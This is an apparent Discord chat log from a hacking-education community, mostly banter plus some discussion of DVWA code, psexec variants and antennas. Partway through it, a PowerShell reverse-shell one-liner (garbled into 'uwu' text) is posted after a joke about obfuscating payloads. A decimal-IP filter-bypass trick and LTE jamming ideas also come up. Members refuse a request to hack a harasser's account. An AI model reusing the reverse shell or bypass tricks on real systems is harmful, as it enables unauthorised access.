#general
1 messages · Page 28 of 1
no his message
oh
like the first ever message on this channel
he left the server wonder how he is now
was it his message
I have immunity to caffeine ig..
his message was "first"
WOW
HK style milk tea is the real deal, rich and creamy
I'll try it one day
people seem to rly like golgo
Sounds good
😭
first message ever?
ye
OMG
Who left the server?
you wouldnt know him
we need to find golgo for golam
so many friends we just loose online
thats life yk
true true
Maybe they find smt better to do
thats why i always say its a cold world we live in
People come, they go, but the marks they leave behind on people are never truly forgotten
it is, it really is ):
i think they cherish memories of me just as i cherish memories of them
why dont you try reaching out to them
just to catch up
nah they are probably gone if they arent on htb
also cant send message cause of no servers in common
when i sent friend request he said if i am on discord i will be here
OSINT him
What if they just deleted the account
When did he leave?
long ago
best boss in Black Myth Wukong IMO
ok @maiden anvil
@zealous charm have you fought yin tiger yet
i like how when u challenge him
he just slams his mallet down on his anvil
and looks at you just like
"the audacity of this mfer to challenge me rn..."
just look at him
he's lookin at u like
"i cant believe this mfer wants me to stop smithing rn"
so if u ever challenge me @zealous charm
just imagine me looking at my screen
like this
consider this your challenge!
good morning, it's a beautiful day for learning~
gm
Learning anything fun today?
just still reading through that first 'information security foundations' path on academy while at work
even tho i cant follow along with the instructions on setting up the VMs and servers and such, still good reading. and i need something to fill these empty hours at helpdesk lol
im in 'setting up' right above it
please get this setup asap
my problem is by the time i get home i dont even want to see a computer lol
ima come back to it this weekend for sure tho
@austere sinew
excited cuz i have a new pc so i should be able to run all the things
dawg u cant be wasting time
the older generations
have had so much time to learn stuff
we gotta catch up
to stay relevant
@waxen mulch I really like talking
no ping extremely busy i am very busy the busiest man alive if the very concept of business was a person i would be that person i am the incarnation of the abstract concept of business the embodiment of having something to do busyness incarnate
really fast like this
then u gotta work twice as fast!!!!
well
lmaooo
i feel im still recovering from earning bachelors online. also finishing associates online thru covid. you know how fun it is to do calculus 1 and 2 online? hint: it's terrible
just now starting up learning again, so it'll kick in soon
i am dying brothaaaa abahhhaha lmaoo
The sweats killed me fr

something tuwu duwu is great
hey again, anyone has recommendations on people to follow on twitter for hacking news?
im not looking for yellow journalism but for more technical news
i like hacking dave, forget his @, but he's also great for health
he's part of hacking your health
hi not looking for yellow jounalism but for more technical news
he runs a cybersec company
Discover the ultimate app and website to transform your text with fun and cute uwu and owo styles. Uwuifier, also known as the Owoifier Translator, is the most advanced uwu and owo text generator on the web. Customize your translations to convert any text, sentence, or word into adorable, stutter-filled, and emotive phrases. Excluding URLs and @...
@HackingDave is his @ lol
Pretty sure he wrote SEToolkit back in the day iirc
hi nyot wooking fow yewwo jounyawism but fow mowe technyical nyews
this is peek
cowd world w-w-we wive in
U_U
UwU
you forgot to say im dad
great thx
i aint claiming you son ✌️
sees bulge OwO whats this?
seeing this im alright after all
@pure terrace another great thing about him is he often gets called to talk about the latest cyber issues on like msnbc type shows (which he always boasts about doing without wearing pants) also he has a delorean lol
its the thing that got written on charlie kirks bullet 😭
im not that degenerate pretty promise
the delorean convinced me
lmao ok i get it
thanks i am gonna use this to obfuscate my powershell delivery payloads
Almost presentation time 
don't be scared worst thing that can happen is that they hire you
hi scared im paint
and you become a corporate drone
It's not for a job 😭
oh nice
It's for my college's technical society in the cybersec department
"technical society" because they are technically in society
US has the weirdest shit when it comes to college i swear
what in the world is a technical society
$cwient = Nyew-Object System.Nyet.Sockets.TCPCwient("192.168.56.101",4444);$stweam = $cwient.GetStweam();[byte[]]$bytes = 0..65535|%{0};whiwe(($i = $stweam.Wead($bytes, 0, $-$bytes.Wength)) -nye 0){;$data = (-(Nyew-Object ---TypeNyame System.Text.ASCIIEncoding).GetStwing($bytes,0, $i);$sendback = (iex $-$data 2>&1 | Out-Stwing );$sendback2 = $sendback + "-"PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stweam.Wwite($sendbyte,0,$sendbyte.Wength);$stweam.Fwush()};$cwient.Cwose()
Kinda?
naaah no way you pulled it off

UwU
Lmao
Like a club
is there a complimentary de-uwu-ifier?
A club based on tech
Yes it works both ways
asking the real questions here
most excellent
so are you telling me that the uwu() map is a isomorphism??
no way
we live in the best times
and we wonder why ai is wasting water
and w-w-we wonder why ai is wasting watew
Can you please pwovide me with youw c-cwedit card detaiws OwO pls its weawwy x3 impowtant because I nyeed to buy something UwU because I-I-I'm just t-twying to get my master all the boops your nose wiw things he nyeeds weawwy x3

stop talking like weebs rn
or im gonna leave this chat
and go somewhere else momentarily
but returning much later
N-No~
water doesn't really get spent though. it gets recycled.
why dont you drink your piss then huh

all the fish pee in the lakes btw, and you still drink water
Cause it has Uric Acid
no its the tears because they couldnt find nemo
henlo sir 
tears of fish hence salty sea

Is that mud or feces
used to watch him as a kid
food
yes
was heartbroken when i saw a picture of him eating pizza when camera was off
pizza "improvised" from the environment
It's just showbiz. Honestly I wouldnt do half of the things he did on the show for survival.
My first instinct always is to make a weapon
And then track and animal for food
Or Go spear fishing.
youre still a kid
not anymore
a baby
now i go to the mines
the children yearn for the mines
earn my bread
until they go inside
After im fed then I would try to figure out which way is north.
i'm f-feeling weally x3 sweepy rn, good night c-chat~ 🥺
(note: no uwuifer used
)
easiest is if you got a line and hooks to set it up for fishing passively, then go figure out warmth and drinking
rise and grind 💪
there be creepers
Ts pmo icl
so thats a minecraft joke
Unfortunately im too stupid to recognize the gutter/cup constellation in the sky so I would probably pick the wrong star
But can also just use the sun which is easier, risas in east, sets on west.
what if it's 7pm and you just woke up but you dont know what time it is? and you're in the middle of no where?
WHAT IF!?!?!?
and when you see squirrels gathering mineral wool for their nests, it's going to be fucking cold winter
Hmm.... Hangover.
7pm is still sunset
I should have just said 7 
morning sun and evening sun are easily distinguishable. but even then, can just wait and see if it gets brighter or darker
not always
But you should always carry a survival kit with a compass and a map with you when youre driving anywhere where theres barren landscape because you never know what can happen.
I put 2 in each of my parents cars
That they dont know about.
also theres something about trees, like moss growing on a specific side means that sides north, i forget exactly. but, not everywhere has trees lol
But they took it out
youre a win 
Yeah I heard of that too...but I think thats a myth
Its crazy how elephants are better navigators than us human beings
it doesn't always grow that way but it can
that's because they still have the organ that tells the way.. humans lost it a few thousand years ago
dogs still got it, but doggos are just superior
cats have it but its glitchy, it leads them to toilets
i wonder what htb could be cooking
maybe the cats are looking for toilets
borrowing AI ideas from THM
What organ see now you just started something major in my head.
best nots be
lol the job posting was up before thm announcement
Guys I need hacking memes for a presentation, ideally anything vaguely related to lateral movement
make ur own meme. BE THE MEMER
hmm maybe I should apply
I've done that for all the other concepts but idk what to do for this one
Maybe plague inc
can someone help me i just bought literal HUGE high gain antennas
I'm not responsible with money someone take it away
maybe something with football, they always gotta move laterally
what u gonna make? ATAK network?
that's what I would make
then get rich off of DOD contracts
DOD lmao
oh excuse me it's DOW now
I don't even know what an SQL injection is i just went a bit too overkill
dude sick
build something cool
Big antennas means free wifi from a nearby starbucks
what can i do with it
give yourself brain cancer maybe from all the high powered signals youll attract
troll all the garage door openers in the neighborhood
Hi
war drive without leaving home
I dont know how to use this
How to do the hacking
so i'll probably have to kill myself with tutorials
@zealous charm
HackRF One
or Flipper
Idk I'm just made of skissue
and attach to antenna
are you sure its a real antenna? if you dont know much, there could be a possibility someone just sold you some big art piece made out of metal coat hangers
Then it sounds like you have your homework this weekend
@zealous charm new business idea
why is it so big
"why did I pay $200 for a Pringles can???"
no no im sure dont worry
in the box it says
50 km
thats pretty far?
@undone notch seriously check this out it's pretty cool https://github.com/deptofdefense/AndroidTacticalAssaultKit-CIV
WHAT THE FUCK IS A KILOMETER
I would do this as a project
gain up to 28 dbi
i can write 50km on a box
if I had a lot of antennae
🦅
Will do
whyd you buy it? lol
Some random kids told me that it's very good and stuff i can barely use linux properly
nobody other than u uses freedom units
i got a raspberry pi 5
stop using it
what is that used for
I was reading nutrition facts for a snack food recently
and the measurement said "one pearl"
and I said to myself "USA will use any measurement except metric"
wtf is that even?
exactly lol
a mile is 5 tomatoes
I'm not rich to afford a pearl to know its measure
it was just a candy 😭 💀
we can all afford Perl tho
what is this ancient technology
It is expensive, fine ones
get_maintainers.pl
no i use them too
what is this tech looking raspberry pi 5 thingy
it looks weird
they are expensive and take a lot of power
raspberry pi is for playing nintendo
so i am looking into esp32 these days
@zealous charm imagine how much cash we could make
if we built a LTE jammer
oh
Great idea!!
how do i use it?
a molotov cocktail works fine
the ship that was bringing the measurements to us sank in 1924 so they never got it
otherwise they would be using it too
i might be wrong about the year but story is true
"freedom units" "proceeds into using the length of a past english king as a measure of length"
i have one
I obviously have no idea how to use it either
i always thought usa used their own as just another way to separate themselves from the british
what do i make with this huge antenna
I bricked my esp32 
well well well
😩
a return label
what is that used for?
it can reach up to 31 miles
i can do pretty cool stuff with it
it's for mailing it back to where you got it

is it too overkill
for my level?
it looks demonic
No u
I have 254 ipads to re-enroll
Which means 254 ipads to update, 254 to factory reset
Something something BREAD

give me one and you have only 253 left 
helping 
I haven't talked about how awesome the Netherlands is for 5 seconds...
if nederlands is awesome only for 5 seconds it's pretty bad
That's NOT what I MEANT.
Actually, we've been lasting since 1588 when we gained independence from the Spanish...
anyone wanna help with a box in boxes channel?
do i need a anti static bag for a raspberry pi?
@elder inlet you're from teh netherlands right?
Oof. Do you have one of those carts
apple is the worst :<
new goal: become leet enough on htb to be allowed gif perms
gifs you can hear
can confirm, i prefer the west boxes though
how to get hacker rank?
South boxes
inb4 its posted somewhere, rtfm, etc lol
appelsaus
JAAAAAA !!!!!
Hahahaha
Difficulty depends on the amount of steps
do pwns on the htb platform link into discord? or do we have to manually verify somehow?
This likely has been asked before; does anyone know if HTB is planning on any AI related certifications? I see they have the AI Read teamer path already.
:c
Automagical
"so what do you hope to accomplish by using htb?"
"to be able to use gifs in their discord"
nodders
You learn skills
das why i chose my name haha
Lmao, there's a whole coat around it.
that'd require me to move, and i just got my house lol
i live in the middle of nowhere. although there is a nuclear power plant being built around 100ish miles away, maybe i can get on there, if i can stomach the commute
i do martial arts, and that's one of the things we always say about sparring, it's great that we can hit people and not get in trouble for it lol
are you amish? lol
like yea maybe in a buggy lol
but it is like at least 10 hours a week... a lot of gas and miles... they'd definitely need to pay me tons for it
i guess 10 hours if im driving 100mph, i cant math either
closer to 12.5 hours, since i drive about 80 mph
but yeh, gif perms, and i gueeeeeess skills are a goal lol
Oooo cars
Kitty has been pet, I am content.
Kitti
Yep, we got tons of those carts, and of course these teachers dont connect the carts to the wall to charge their contents... so all of these ipads are dead, and they have to charge for me to check for serial numbers and update them
I might go get some Raisin Cain
chicken fingers
fries
secret sauce
mmmm nom nom
During a safari outside Hwange National Park in Zimbabwe, this group of people witnessed a rare encounter between a honey badger and a young bull elephant. The honey badger first fought with a warthog and even chased a herd of elephants away from a waterhole before confronting the bull elephant. It bit the elephant's leg, but was kicked and tram...
what
1.25 at 80mph is what i calculated lol
I know of people who commute via plane to save money so it’s not that extreme
I’d presume interstate
100mi being a town over
i live in the middle of nowhere. nearest 'city' is 15 miles east, beyond that it's at least 80 miles in any direction
Being in the middle no where is so nice and sucky at the same time
my citys pop is like 11k, that 15 mile away city is like 18k
My in laws place is very middle of nowhere with the entire county being 2k
Kansas go brrr
can drive an hour north/northeast and pass thru towns whos signs literally say their pop is under 200
its literally a store, a church, a bar, and some houses
lots of farmland
My money is on it being a dollar tree
Midwest I presume?
the state that doesn't exist
You can drive for 12h+ and be the same state here
What the hell man 💀
Idk which one that is
What even is Linux fundamentals
North Dakota?
its a meme
It's huge 🥲
I need to Goto Iowa soon
but, wyoming
Oh that exists right
Tell me you're joking..
Remember you don't need to know everything, just remember the ones that will be used the most etc, you can always Google how to do something later on
sadly yes
I can never remember states lol
it's the most square one
Yeah you're right
Alright enough venting I'm going back to study 💀🥀
Have a good one guys
That’s many
thats why i said most square lol
i think its the closest to being very equal sides
i wasn't able to pwn offshore today, but on the positive side, I got this little chonky ball:
I mean I used to do 1 hour of academy everyday for 3 months at my job and I got to 55-60%. If I wasn't limiting myself to 1 hour I'd be finished in a little over a month.
Just put some music on and grind, good luck though
that's like the opposite of the stories we usually hear. theyre usually 'i was born in a small village in the middle east and my parents moved to iowa when i was 6 months old'
Having American tax obligations must suck lmao
I was kidding with the drive thru shit no way I would do such thing 💀
But yeah tbh if you don't enjoy the grind then it would be a very sufferable journey..
Still have to file a return every year
Ontop of FBAR etc just by being American no matter where you live
It’s honestly why I never want to become American 😂
Debating getting PR off and on, but tax obligations of citizenship make it no thanks
thought you were from america with all those states you visited
I’ve visited way more and I’m Canadian
So guys before I peace out
We have cube talk tomorrow right?
Think so
seems very sketchy to be an 'immigrant' here these days 🙁
even just a visitor it seems
Love Canada, was just in Ontario a month ago for 2 weeks with my buddies and their wedding
I personally pin my risk as low being Canadian
It’s hard to distinguish from an American
Nice 🙂
I’m in Quebec personally
Idk if I've met someone from Quebec yet, I've met plenty from Alberta though
he did a talk at my college (online). using his real name 😮
Is it that hard to find?
they made it seem like it was a big deal
but maybe it was a joke
at the time i had never heard of him
He used to not show his face or anything
anyone have an idea why cloud isn't in the discord anymore?
a more disheveled ray romano
No idea
People come and go it’s part of life
reminds me of a line from a song ♪ evil comes and evil goes, just like the drugs from mexico ♫
How in the world can i defend myself smoeone help
I mean a lot of the discord history is forgotten
My ex is making accounts on tiktok harrassing me
Police
I've been trying to report they don't care
im starting to think drove is a troll or a bad bot
He made a tiktok account literally making videos using my name is there any way i can just go in his acc and delete it i have a loooot of infos about him
No
Report it properly
What ni the world do u think i did
I literally did everything possible
I asked him politely
He doesn't care
I already have a new boyfriend why harrass me tho
no
not at all
"is there any way i can just go in his acc and delete it i have a loooot of infos about him"
Yes you are
we are not helping you do that
the CFAA is broad, and stupidly overreaching
your only real options are reporting to platforms, cops, or defamation/liable suit
do not
ok thats something you need to get the police involved for g
was a joke lmao ahahah ofc i'm not gonna do anything lmaoo
get a restraining order or smn
do not
me and azomax are just joking
aw0ken i mean
inst that impersonation
do not

well they dont care im in morrocco
for all we know you're the harrasser, and he's the victim, and you're lying to rile people up
nor would vigilatee "justice" do any good
Alright do i need to pay them?
why would you have to pay the police to do their job 😭
id argue its less cybercrime because of the other things theyve said
Hi
drova has a lot of interesting problems and i can't tell if any are real
you'd b surprised
😭
they sadly are
I know some third world countries where a bribe is "required" but never anything official lol
yeah lol
well, lunch break has arrived and im a hungry hungry hacker, see you guys next time i see you guys!
i think at this point there isnt much more we can do here -
As long as you don't pay them they never take us seriously
What is goin on
once got demanded a bribe from a bangladeshi border person 😭(all our documents were in order as well lol)
I remember having someone knocking at my door with a screwdriver i called them they started laughing
in the phone
checks out
why am i receiing DMs from people asking for the user 😭 i don't know the username bros
😹
it's like fifth DM already
No jk
its why i avoid leaving NA/EU lol
dont dm me tho
i wont give any info
I dont want anything bad happening to that person
They're just immature
@undone notch there isnt much more we can do here, i think its best we move on from the subject ok?
Yeah sure why not ill try reaching out to some cybercrime whatever agency
yeah law enforcement/legal channels are going to be your best bet.
lets switch up subjects this isnt worth it
also open a support ticket on tiktok and do some fancy legal talk(official terminology) to get them to remove the account
Tiktok report system is horrifically shit
Exactly
Fever
hi
do u have a fever
maybe know that US tiktok is splitting to oracle itll get better
@static pasture is it goig to be in java now
plz give us java tiktok
Why did the pharmacist tip toe through the pharmacy?
reminds me, i need to get a java chip implanted in my hand
same,, it feels like a waste of time
The first human that runs java
Java and Tiktok suck
i mean a few people have them
OSCP CEO
it can do OTP etc
Because of the sleeping pills 🥁 
Hello 🐦
@lilac cipher https://dangerousthings.com/product/apex-flex/
The VivoKey Apex Flex is the ultimate subdermal security key for digital identity, cryptography, and blockchain applications! Antenna Comparison 8mm x 28mm (narrow; short range, 4g needle install) Want an analog? Check out the STL 14mm x 35mm (module; long range, advanced install) subdermal security key JCOP 4 / Java Card 3.0.5 suppo...
this specifically
pinging ZQA, i see we are very brave
please dnot
they literally responded to me 10s ago 😭
Holy that is expensive
probably to steal drugs who knows
Phew
Tomorrow cube talks I hope they will explain what is going on with let's defend
cause i am not insane enough to do it myself
Because of the sleeping pills
People do that?!
We will, but what questions do you have?
Yes.
isn't gonna be new content from let's defened??
Whaaaaaaa
plz plz pzlz
i know of someone who removed it herself in a work bathroom cause they had to(SCIF)
Dont you already have an implant?
I want my few bucks for vip+ to be worth it
for the love of god, no
win win tbh
For now the 2 platforms will remain split with the current pricing
I wanna know what is going to change and if more content will be added 
further details will be announced in time
Nothing changed then
the shorter and crap answer is nothing will change for a while
For us the commoners
That is one approach. 😂
Wait, LetsDefend and HackTheBox are ran by the same people?
it takes along time on our end for us to migrate things and makes things ready
HTB Acquired LetsDefend
merger & acquisition academy module when
Hurry up and wait kind of deal.
Its gonna be a minute lol, look at vuln acq - release type thing
Daaaaang so it will actually be good now! Whaaat!? I legit left LetsDefend to come here because I was so unhappy with the experience and lack of community.
HTB Law School when
Never because lawyers sck
But but harvey specter...
Psh Mike Ross
eh, they can be aight
He's a fraud!
just gotta find the right one
He became legit
My brother in law is a lawyer
Yeah he did but he was a fraud!
All he seems to do is go out for drinks
my lawyer is a lawyer
ahem "networing"
And became legit and then dipped from the firm hahah
Yes
and "client meetings"
I would hope so o7
That’s what he says
corpo lawyer?
Yes
yeah makes sense
boo corpo lawyers
He does mergers an acquisitions
lawyers are one of those jobs where the personality required is kinda ew
same w/sales lmao
(no shade against sales people - i just despise alot of sales things)
Yeah they’re a different breed

like ffs "email for quote" -> emails ->" book a meeting with us!" please god no
i know what i want just give me a fcking price
I hate those
i refuse to purchase from orgs that do that
Me when i want enterprise
Everything could just be an email
The linux kernel proves that
i mean i get it if your unsure about the product or wanna learn more
but when i know what i want just price me
Everything is a mail
A meeting is only good when you require to read body language
Some things would require a lot of emails
True, but email
Hahah
Other than that, email it or voice message it
i despise when people cant just be direct and try to do a million things
just give it straight
People still leave voicemails?
fax it!
WhatsApp’s voice messages
Carve it in stone
Voicemail, psh what’s that again
lol Whatsapp
Yeah. Mergers tend to be a slow deal.
Dino age
i mean this LD deal has been in the works for ages
its surprisingly big
If you need to get a hold of falcon, send a message on IRC
I use Teams a lot too
what about AOL/AIM
MSN / ICQ
Man the nudge function really was fun
VampireFreaks
idk im too young for that stuff
You remember, Windows Live Messenger, right, Emma?
java in 2025 

我讨厌 Java
aghghghg
translator
i hate it
🤣🤣
i speak english i swear
I guess lots of critical infrastructure still runs on cobol too so.. yeah
trust me
Sure sure

trust me vro
We hate it too
看,我会说英语
look i can speak english
aagaghgahgh
again
AGAIN
Busted
Yum
yum

is it english, or is it british
鸡肉真好吃
i have burg and ring 🍔🧅
Lets keep it English lol

Not really racist, just server rules so everyone can understand without having to use a translator for each message lol
mods gonna spank ya
ew be. normal
We don’t have Cane here
Hey what's up sparkling water
Not much man
yes
You?
?
Working on Metasploitable 2 linux box from vulnhub
Nice!
COBOL - Introduction
Watch More Videos at https://www.tutorialspoint.com/videotutorials/index.htm
Lecture By: Mr. Nishant Malik, Tutorials Point India Private Limited.
I just did Lock
currently working on tasks for
Damn Vulnerable Web Application (DVWA) v1.0.7
Nobody is a coder until watching the 2 hours video:
Enternl PoOoOintr Veriebl, enternL ppoOoOintr Veriebl
<?php
if (isset($_POST['submit'])) {
$target = $_REQUEST["ip"];
$target = stripslashes($target);
$octet = explode(".", $target);
if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4)) {
$target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec('ping ' . $target);
echo '<pre>' . $cmd . '</pre>';
} else {
$cmd = shell_exec('ping -c 3 ' . $target);
echo '<pre>' . $cmd . '</pre>';
}
} else {
echo '<pre>ERROR: You have entered an invalid IP</pre>';
}
}
?>
@green kite this is the highest security level in DVWA. Do you find any command injection vuln in this code? I don't. I see it is taking the input, exploding at the . and then verifying each octet is numeric. I don't think this code is vuln unless you can see something I can't.
The only thing is that it doesn't check to see if the octet is between 0-255. Can't seem to do int overflow either.
i was just thinking that, if itd be possible to enter super huge numbers and crash ping somehow
Mmm
I don’t think this is vulnerable ?
$target variable gets reassigned to itself, I would try checking if sending ip as an array could somehow affect the outcome
Its hard to read in the phone
Idk I'm not by my computer but that was a good one to think about
I think that's not vulnerable too
Alright. Thanks for confirming guys
I wonder why they would include it as a challenge in DVWA if it's not vuln.
I'm confused.
Or maybe it's an example of how to securely code in PHP
I think is an example of secure code
Called impossible for a reason
Maybe I'm on an older version of the app
There is no impossible level
There are only 3 security levels you can choose from, low, medium, high. This is high security.
Damn Vulnerable Web Application (DVWA) v1.0.7 on Metasploitable2-linux VM
Could be something vulnerable, can't find any from glance
I saw an article on google with the same code, but it says it's impossible. It's secure code.
this is not vulnerable because of a size check on octet
Yup
hello, bit of a random question mayhaps, but is there any way to view more team scores on the htb scoreboard (than 100)? or read them through api? is there another service displaying such info anywhere else?
the usecase is to run a couple of teams over a weekend at the U and to be able to check each others scores... 😉 any help appreciated.
U can find other vulnerabilities and change the source from that vuln 😎
In another part of challenges
I think it's easier to get in the top 100
All of the api is undocumented
So you just have to FAFO
it's possible without the size check you could maybe trick it with some hex conversion to bypass stripslashes with an IP that resolves to 0xd + hex-encoded commands in final octet
so is this a trick question? is that beneficial to have?
but the size check stops you from having a final octet like 1.1.1.0xd(whatever hex for $(id) is)
not sure that would break the logic, probably have to use first octet
but I digress
The code is vulnerable because it doesn't support ipv6
Hahaha
How does is_numeric works?
Does it. Take. Hex?
a lot of people dont know you can ping hex representations of IP's 
Also decimal
127.1
Wow r u a hacker??
finally got the root of my first windows box (also my first ldap box), i was having a hard time even following the tutorial
He just read Wikipedia
Congrats 🙌
It does. For. Old. Php like <7
Switch Wikipedia with hacktricks.xyz and you got it
Too difficult
i learned it from NextGenHacker101
just tried this and it worked o.o
Is that the person who wrote github_autopwn???
now dont use it to bypass filters at school
be good
i heard that guy is really good
and works for faang now
Suspension incoming

i work at a school
Do not
honestly id be shocked if that dumb trick still works on modern firewalls
I heard he used to interview talented hackers 
i work in IT at a community college~
yeah i heard he's friends with a guy who is like top 100 or something on bugcrowd
maybe even top 50 these days
we all start somewhere buddy
At least you got a job 😉
and we cant go anywhere in this institution, no pathways for advancement cuz everyone's job is filled lol someone has to quit, get fired, or die for there to be an opening
But you can get experience and grow elsewhere
exactly! and i can live my life iwth all my needs met and have a lil leftover for another steam game i wont play
You got your foot in the market now
hell yea. no getting rid of me now haha
@zealous charm can u imagine if those youtuber and bugcrowd guys worked in academia
and how much they could shake up the whole ecosystem
i bet they would just tell the bounty hunter to start teaching classes
and fire the existing professor
youtubers probably make way more money than a community college pays
I think hacking youtube would be a good side gig rn
if u can drown out networkchuck
and david bombal
u can probably make some money with talent
You probably could king 👑
david bombal lmaoooooooooooooooooo
nobody wants to listen to me talk about aliens @zealous charm
Just brew another pot of coffee and get crackin
i think i have a wireshark course from bombal
dawg im finna make another cup rn
I know even decimal notation but SHHHHHHHHHHHVH
DONT TELL EM
I SWEAR TO VOD
@lilac cipher please bully @zealous charm
If you tell em
he is weaponizing my addiction against me
@zealous charm your pfp has more hair than you!
@willow magnet if I make a nuclei mcp server rn would u use it?
You know what time it is
ping 2130706433
The spice extends life.
The spice expands consciousness.
The spice is vital to space travel.
To travel... without moving.
A whole projectdiscovery MCP would be better since it would expose multiple tools
dawg
imagine we could have an aggressor script
that bridges an LLM to a beacon
and uses a MCP server for post-ex tools!
so you could potentially just say
"hey llm please escalate me to admin"
and the beacon would just do it for you

It’s all fun and games until the LLM ctrl+c’s psexec.py and leaves orphaned service binaries with random names across the domain
Im calling the emperor
Provided to YouTube by Noise Records
Horus Aggressor (2020 Remaster) · Hellhammer
Apocalyptic Raids
℗ 2020 Sanctuary Records Group Ltd., a BMG Company
Released on: 1984-03-08
Performer: Hellhammer
Vocals, Guitar, Producer: Thomas Gabriel Fischer
Bass Guitar, Background Vocals, Producer: Martin Ain
Drums: Bruce Day
Composer: Thomas Gabr...
this is exactly why AI automated pentesting cant work
damn
HEADBANG! TIME!
It’s okay, junior pentesters do this too
Ask me how I know 
interesting 

Uh- yeah I could see myself doing this
Leave souvenirs behind for the blue team!
yeah I would for sure
Forbidden scavenger hunt
one of our inf teams got domain admin from it last time, just had mimikatz and other things casually hanging about
sup guys
Hi
In an internship interview i was asked the difference between impacket’s psexec.py, metasploits psexec, and the sys internals psexec. Pretty good question and important to know how the different implementations work differently
You just gonna keep us in suspense or you gonna tell us?
I’d never rob you of that research opportunity 💪
Doing a wikipedia deep dive and apparently salmonella can commit suicide.
Bro this is soooo obvious
Like if you don't know
Sigh
Obviously impackets implementation is written in python, metasploit's in ruby and sys internals in c#
Am i hired now?
Yes
I am metasploit hacker 🫃 🫄 🤰
Ok then how does psexec work in metasploit
🫃
wow!!!!!!
Tbh it was a good interview. They asked the standard “talk through a pentest” but added “anytime you mention a tool name you have to pause and explain how it works at a high level”







